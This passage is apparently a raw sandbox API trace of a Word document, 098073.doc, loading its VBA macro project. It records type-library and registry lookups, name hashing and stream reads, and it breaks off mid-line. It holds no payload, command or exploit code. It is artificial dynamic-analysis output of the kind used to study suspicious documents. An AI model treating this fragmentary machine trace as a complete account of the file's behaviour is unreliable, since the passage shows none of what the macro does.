lpsz="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library", cchLength=0x6f | out: lpsz="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\syswow64\\fm20.dll#microsoft forms 2.0 object library") returned 0x6f [0030.083] IMalloc:Alloc (This=0x7fefe015380, cb=0xe0) returned 0x784c580 [0030.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\syswow64\\fm20.dll#microsoft forms 2.0 object library", cchWideChar=112, lpMultiByteStr=0x784c580, cbMultiByte=224, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\syswow64\\fm20.dll#microsoft forms 2.0 object library", lpUsedDefaultChar=0x0) returned 112 [0030.083] IMalloc:Free (This=0x7fefe015380, pv=0x784c580) [0030.083] wcscpy_s (in: _Destination=0x54f1ae8, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0030.083] wcsncpy_s (in: _Destination=0x2e6470, _SizeInWords=0x108, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0030.083] CharLowerBuffW (in: lpsz="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\SysWOW64\\FM20.DLL#Microsoft Forms 2.0 Object Library", cchLength=0x6f | out: lpsz="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\syswow64\\fm20.dll#microsoft forms 2.0 object library") returned 0x6f [0030.083] IMalloc:Alloc (This=0x7fefe015380, cb=0xe0) returned 0x784c580 [0030.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\syswow64\\fm20.dll#microsoft forms 2.0 object library", cchWideChar=112, lpMultiByteStr=0x784c580, cbMultiByte=224, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{0d452ee1-e08f-101a-852e-02608c4d0bb4}#2.0#0#c:\\windows\\syswow64\\fm20.dll#microsoft forms 2.0 object library", lpUsedDefaultChar=0x0) returned 112 [0030.083] IMalloc:Free (This=0x7fefe015380, pv=0x784c580) [0030.083] wcsncpy_s (in: _Destination=0x2e6430, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.083] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6360, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.083] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.083] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.083] wcscpy_s (in: _Destination=0xb4c6778, _SizeInWords=0x81, _Source="*\\G{47391987-526A-45DC-AC64-BAA206303800}#2.0#0#C:\\Users\\1\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{47391987-526A-45DC-AC64-BAA206303800}#2.0#0#C:\\Users\\1\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object Library") returned 0x0 [0030.083] IMalloc:Alloc (This=0x7fefe015380, cb=0x208) returned 0x2d28370 [0030.083] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e6020 | out: phkResult=0x2e6020*=0xa26) returned 0x0 [0030.084] RegOpenKeyW (in: hKey=0xa26, lpSubKey="{0D452EE1-E08F-101A-852E-02608C4D0BB4}", phkResult=0x2e6018 | out: phkResult=0x2e6018*=0xa2e) returned 0x0 [0030.084] RegEnumKeyW (in: hKey=0xa2e, dwIndex=0x0, lpName=0x2e6048, cchName=0xa | out: lpName="2.0") returned 0x0 [0030.084] wcscpy_s (in: _Destination=0x2e6030, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0030.084] RegOpenKeyW (in: hKey=0xa2e, lpSubKey="2.0", phkResult=0x2e60d8 | out: phkResult=0x2e60d8*=0xa36) returned 0x0 [0030.084] _ultoa_s (in: _Val=0x0, _DstBuf=0x2e6050, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0030.084] RegOpenKeyA (in: hKey=0xa36, lpSubKey="0", phkResult=0x2e6040 | out: phkResult=0x2e6040*=0xa3e) returned 0x0 [0030.084] RegOpenKeyW (in: hKey=0xa3e, lpSubKey="win64", phkResult=0x2e6048 | out: phkResult=0x2e6048*=0xa46) returned 0x0 [0030.085] RegCloseKey (hKey=0xa46) returned 0x0 [0030.085] RegCloseKey (hKey=0xa3e) returned 0x0 [0030.085] _ultow_s (in: _Value=0x0, _Buffer=0x2e60e0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.085] RegOpenKeyW (in: hKey=0xa36, lpSubKey="0", phkResult=0x2e60b8 | out: phkResult=0x2e60b8*=0xa3a) returned 0x0 [0030.085] RegQueryValueW (in: hKey=0xa3a, lpSubKey="win64", lpData=0x2e6100, lpcbData=0x2e60b4 | out: lpData="C:\\Windows\\system32\\FM20.DLL", lpcbData=0x2e60b4) returned 0x0 [0030.085] wcscpy_s (in: _Destination=0x2d28370, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\FM20.DLL" | out: _Destination="C:\\Windows\\system32\\FM20.DLL") returned 0x0 [0030.085] RegCloseKey (hKey=0xa3a) returned 0x0 [0030.085] RegCloseKey (hKey=0xa36) returned 0x0 [0030.086] RegCloseKey (hKey=0xa2e) returned 0x0 [0030.086] RegCloseKey (hKey=0xa26) returned 0x0 [0030.111] IUnknown:QueryInterface (in: This=0x782b300, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6528 | out: ppvObject=0x2e6528*=0x0) returned 0x80004002 [0030.111] ITypeLib:RemoteGetLibAttr (in: This=0x782b300, ppTLibAttr=0x2e6520, pDummy=0x10 | out: ppTLibAttr=0x2e6520, pDummy=0x10) returned 0x0 [0030.111] ITypeLib:RemoteGetDocumentation (in: This=0x782b300, index=-1, refPtrFlags=0x0, pBstrName=0x2e6518, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xb459956 | out: pBstrName=0x2e6518*="Microsoft Forms 2.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0xb459956) returned 0x0 [0030.111] StringFromGUID2 (in: rguid=0x766cae0*(Data1=0xd452ee1, Data2=0xe08f, Data3=0x101a, Data4=([0]=0x85, [1]=0x2e, [2]=0x2, [3]=0x60, [4]=0x8c, [5]=0x4d, [6]=0xb, [7]=0xb4)), lpsz=0x2e6540, cchMax=39 | out: lpsz="{0D452EE1-E08F-101A-852E-02608C4D0BB4}") returned 39 [0030.111] _ultow_s (in: _Value=0x2, _Buffer=0x2e648a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0030.111] _ultow_s (in: _Value=0x0, _Buffer=0x2e648e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.111] _ultow_s (in: _Value=0x0, _Buffer=0x2e6492, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0030.111] wcscpy_s (in: _Destination=0xb4599f8, _SizeInWords=0x70, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0030.111] wcscpy_s (in: _Destination=0xb4599fe, _SizeInWords=0x6d, _Source="{0D452EE1-E08F-101A-852E-02608C4D0BB4}" | out: _Destination="{0D452EE1-E08F-101A-852E-02608C4D0BB4}") returned 0x0 [0030.111] wcscpy_s (in: _Destination=0xb459a4a, _SizeInWords=0x47, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0030.111] wcscpy_s (in: _Destination=0xb459a58, _SizeInWords=0x40, _Source="C:\\Windows\\system32\\FM20.DLL" | out: _Destination="C:\\Windows\\system32\\FM20.DLL") returned 0x0 [0030.111] wcscpy_s (in: _Destination=0xb459a92, _SizeInWords=0x23, _Source="Microsoft Forms 2.0 Object Library" | out: _Destination="Microsoft Forms 2.0 Object Library") returned 0x0 [0030.111] ITypeLib:LocalReleaseTLibAttr (This=0x782b300) returned 0x0 [0030.111] wcscpy_s (in: _Destination=0xb4c6880, _SizeInWords=0x70, _Source="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" | out: _Destination="*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library") returned 0x0 [0030.111] IMalloc:Free (This=0x7fefe015380, pv=0x2d28370) [0030.112] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MSForms") returned 0x100f43 [0030.112] strcpy_s (in: _Dst=0x2e64f0, _DstSize=0x8, _Src="MSForms" | out: _Dst="MSForms") returned 0x0 [0030.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e64f0, cbMultiByte=8, lpWideCharStr=0x2e6340, cchWideChar=8 | out: lpWideCharStr="MSForms") returned 8 [0030.112] IUnknown:AddRef (This=0x782a220) returned 0x3 [0030.112] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x2e6410, pBstrLibName=0x2e6340 | out: pfName=0x2e6410*=0, pBstrLibName=0x2e6340) returned 0x0 [0030.112] IUnknown:Release (This=0x782a220) returned 0x2 [0030.112] IUnknown:AddRef (This=0x731da90) returned 0x3 [0030.112] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x2e6410, pBstrLibName=0x2e6340 | out: pfName=0x2e6410*=0, pBstrLibName=0x2e6340) returned 0x0 [0030.112] IUnknown:Release (This=0x731da90) returned 0x2 [0030.112] IUnknown:AddRef (This=0x731cc80) returned 0x5 [0030.112] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x2e6410, pBstrLibName=0x2e6340 | out: pfName=0x2e6410*=0, pBstrLibName=0x2e6340) returned 0x0 [0030.112] IUnknown:Release (This=0x731cc80) returned 0x4 [0030.112] IUnknown:AddRef (This=0x7829f50) returned 0x2 [0030.112] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x2e6410, pBstrLibName=0x2e6340 | out: pfName=0x2e6410*=0, pBstrLibName=0x2e6340) returned 0x0 [0030.112] IUnknown:Release (This=0x7829f50) returned 0x1 [0030.112] IUnknown:AddRef (This=0x782b300) returned 0x2 [0030.112] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="MSForms", lHashVal=0x100f43, pfName=0x2e6410, pBstrLibName=0x2e6340 | out: pfName=0x2e6410*=0, pBstrLibName=0x2e6340) returned 0x0 [0030.112] IUnknown:Release (This=0x782b300) returned 0x1 [0030.112] IMalloc:Alloc (This=0x7fefe015380, cb=0x48) returned 0xb4e31c0 [0030.112] IMalloc:Free (This=0x7fefe015380, pv=0x77726a0) [0030.112] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668b50 [0030.112] IMalloc:Free (This=0x7fefe015380, pv=0xb4e31c0) [0030.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e6560, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e66a0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.113] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837780 [0030.113] IMalloc:GetSize (This=0x7fefe015380, pv=0x7837780) returned 0x80 [0030.113] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776c050 [0030.113] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0x776c1d0 [0030.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e6560, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.113] CoCreateGuid (in: pguid=0x2e6290 | out: pguid=0x2e6290*(Data1=0x729dc2f7, Data2=0x2526, Data3=0x4030, Data4=([0]=0x93, [1]=0x37, [2]=0x73, [3]=0xcd, [4]=0xfd, [5]=0xef, [6]=0xbd, [7]=0xc1))) returned 0x0 [0030.113] CoCreateGuid (in: pguid=0x2e62a0 | out: pguid=0x2e62a0*(Data1=0xfdb57958, Data2=0x3fb8, Data3=0x48b7, Data4=([0]=0xbd, [1]=0x50, [2]=0xe9, [3]=0xff, [4]=0x24, [5]=0x79, [6]=0x51, [7]=0xa5))) returned 0x0 [0030.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e62b0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.113] GetLocalTime (in: lpSystemTime=0x2e6188 | out: lpSystemTime=0x2e6188*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x15)) [0030.113] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c6424, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6120, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.113] IMalloc:Alloc (This=0x7fefe015380, cb=0x170) returned 0xb4f3b40 [0030.113] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7808fa0 [0030.113] strcpy_s (in: _Dst=0x7801378, _DstSize=0xd, _Src="ThisDocument" | out: _Dst="ThisDocument") returned 0x0 [0030.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.113] wcscpy_s (in: _Destination=0xb4c6510, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0030.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.113] wcscpy_s (in: _Destination=0xb4c6530, _SizeInWords=0xd, _Source="ThisDocument" | out: _Destination="ThisDocument") returned 0x0 [0030.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x54) returned 0x7809000 [0030.114] IMalloc:Free (This=0x7fefe015380, pv=0xb46e9b0) [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668b50 [0030.114] IMalloc:Free (This=0x7fefe015380, pv=0x7809000) [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb4cf950 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668b50 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490050 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837930 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fab0 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fad0 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x688) returned 0xb4fe2a0 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78379c0 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x640) returned 0xb4fe930 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668b20 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0x777fbc0 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6040 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668af0 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7837a50 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0x7231170 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0x7231580 [0030.114] IMalloc:Alloc (This=0x7fefe015380, cb=0x400) returned 0x7231990 [0030.114] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.114] strcpy_s (in: _Dst=0x2e62f0, _DstSize=0xa, _Src="_Evaluate" | out: _Dst="_Evaluate") returned 0x0 [0030.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e62f0, cbMultiByte=10, lpWideCharStr=0x2e6140, cchWideChar=10 | out: lpWideCharStr="_Evaluate") returned 10 [0030.114] IUnknown:AddRef (This=0x782a220) returned 0x3 [0030.114] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e6210, pBstrLibName=0x2e6140 | out: pfName=0x2e6210*=0, pBstrLibName=0x2e6140) returned 0x0 [0030.114] IUnknown:Release (This=0x782a220) returned 0x2 [0030.114] IUnknown:AddRef (This=0x731da90) returned 0x3 [0030.114] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e6210, pBstrLibName=0x2e6140 | out: pfName=0x2e6210*=0, pBstrLibName=0x2e6140) returned 0x0 [0030.114] IUnknown:Release (This=0x731da90) returned 0x2 [0030.114] IUnknown:AddRef (This=0x731cc80) returned 0x5 [0030.114] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e6210, pBstrLibName=0x2e6140 | out: pfName=0x2e6210*=0, pBstrLibName=0x2e6140) returned 0x0 [0030.114] IUnknown:Release (This=0x731cc80) returned 0x4 [0030.114] IUnknown:AddRef (This=0x7829f50) returned 0x2 [0030.114] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_Evaluate", lHashVal=0x10d918, pfName=0x2e6210, pBstrLibName=0x2e6140 | out: pfName=0x2e6210*=1, pBstrLibName=0x2e6140) returned 0x0 [0030.114] IUnknown:Release (This=0x7829f50) returned 0x1 [0030.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_Evaluate", cchWideChar=-1, lpMultiByteStr=0x2e62f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_Evaluate", lpUsedDefaultChar=0x0) returned 10 [0030.114] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_Evaluate") returned 0x10d918 [0030.114] wcsncpy_s (in: _Destination=0x2e6300, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0030.114] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0030.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e6230, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0030.114] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned -4 [0030.114] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0030.114] CExposedDocFile::AddRef () returned 0x3 [0030.114] CExposedDocFile::AddRef () returned 0x4 [0030.114] CExposedDocFile::OpenStream () returned 0x0 [0030.114] CExposedDocFile::Release () returned 0x3 [0030.114] CExposedStream::Seek () returned 0x0 [0030.115] CExposedStream::AddRef () returned 0x2 [0030.115] CExposedStream::Read () returned 0x0 [0030.115] IMalloc:Alloc (This=0x7fefe015380, cb=0x2028) returned 0xb4fef80 [0030.155] IMalloc:Alloc (This=0x7fefe015380, cb=0x10020*=0x10128) returned 0xb500fb0 [0030.155] CExposedStream::AddRef () returned 0x3 [0030.155] CExposedStream::Release () returned 0x2 [0030.155] IMalloc:Alloc (This=0x7fefe015380, cb=0x2ee0) returned 0xb510fe0 [0030.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x800) returned 0x763cdf0 [0030.156] CExposedStream::Read () returned 0x0 [0030.156] CExposedStream::Read () returned 0x0 [0030.156] IMalloc:Alloc (This=0x7fefe015380, cb=0x404) returned 0x7231da0 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x80", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x81", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x82", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x83", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x84", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="…", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x86", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x87", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x88", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x89", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8a", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8b", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8c", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8d", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8e", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x8f", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x90", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x91", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x92", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x93", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x94", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x95", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x96", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x97", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x98", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x99", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9a", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9b", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9c", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9d", cchSrc=1, lpCharType=0x2e6400 | out: lpCharType=0x2e6400) returned 1 [0030.156] GetStringTypeA (in: Locale=0x800, dwInfoType=0x4, lpSrcStr="\x9e", cchSrc=1, lpCharType=0x2e6400 | out: 